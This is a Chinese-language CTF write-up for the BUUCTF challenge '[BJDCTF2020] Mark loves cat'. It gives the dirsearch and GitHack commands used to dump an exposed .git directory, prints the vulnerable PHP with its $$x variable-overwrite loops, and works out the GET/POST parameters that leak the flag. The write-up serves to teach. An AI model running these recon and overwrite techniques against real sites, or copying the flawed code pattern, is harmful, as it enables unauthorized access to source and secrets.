web buuctf [BJDCTF2020]Mark loves cat1

考点:

1.git泄露

2.变量覆盖

1.打开靶机,先看robots.txt,并用dirsearch进行扫描

 py dirsearch.py -u f190ddaf-3db0-48c2-a858-4accf0783a69.node4.buuoj.cn:81/ -e * -t 1 -x 429

(使用dirsearch时,一定要设置好线程,不然扫不出来)

扫描发现错在.git泄露

2.利用githack把git文件抓下来

 python2 GitHack.py http://f190ddaf-3db0-48c2-a858-4accf0783a69.node4.buuoj.cn:81/.git/

(githack支持python2,另外在使用githack时要在url后面加上.git)

(我抓出来index.php和flag.php,但是抓不到本地,我试了好几次才行的,应该和网有关系)

3.扫描的同时,看看文件有没有注入点,看contact下面有message,尝试了基础注入,没再试,正好扒出来.git了,估计漏洞不在这,就没继续试

4.index.php的关键代码如下

 $y){
    $$x = $y;
}

foreach($_GET as $x => $y){
    $$x = $$y;
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}



echo "the flag is: ".$flag;

进行代码审计:

echo "the flag is: ".$flag;  
//提示flag就是$flag,输出$flag就可

往上推,发现输出点在exit()函数里面,在两个if语句里最后令is=flag和yds=flag,将这两个参数放在代码中顺一遍,看是否能执行到

a.is=flag  foreach进行遍历,存在变量覆盖$$x=$$y ->$is=$flag(变量覆盖,is的值不再是cat),进入

  if判断,需要传参数,有两种方法既可以在get里加上flag=flag,也可以在post里加

b.yds=flag,这个比较好理解了,把flag给到了yds

web buuctf [BJDCTF2020]Mark loves cat1_第1张图片

 

你可能感兴趣的:(.git泄露,变量覆盖)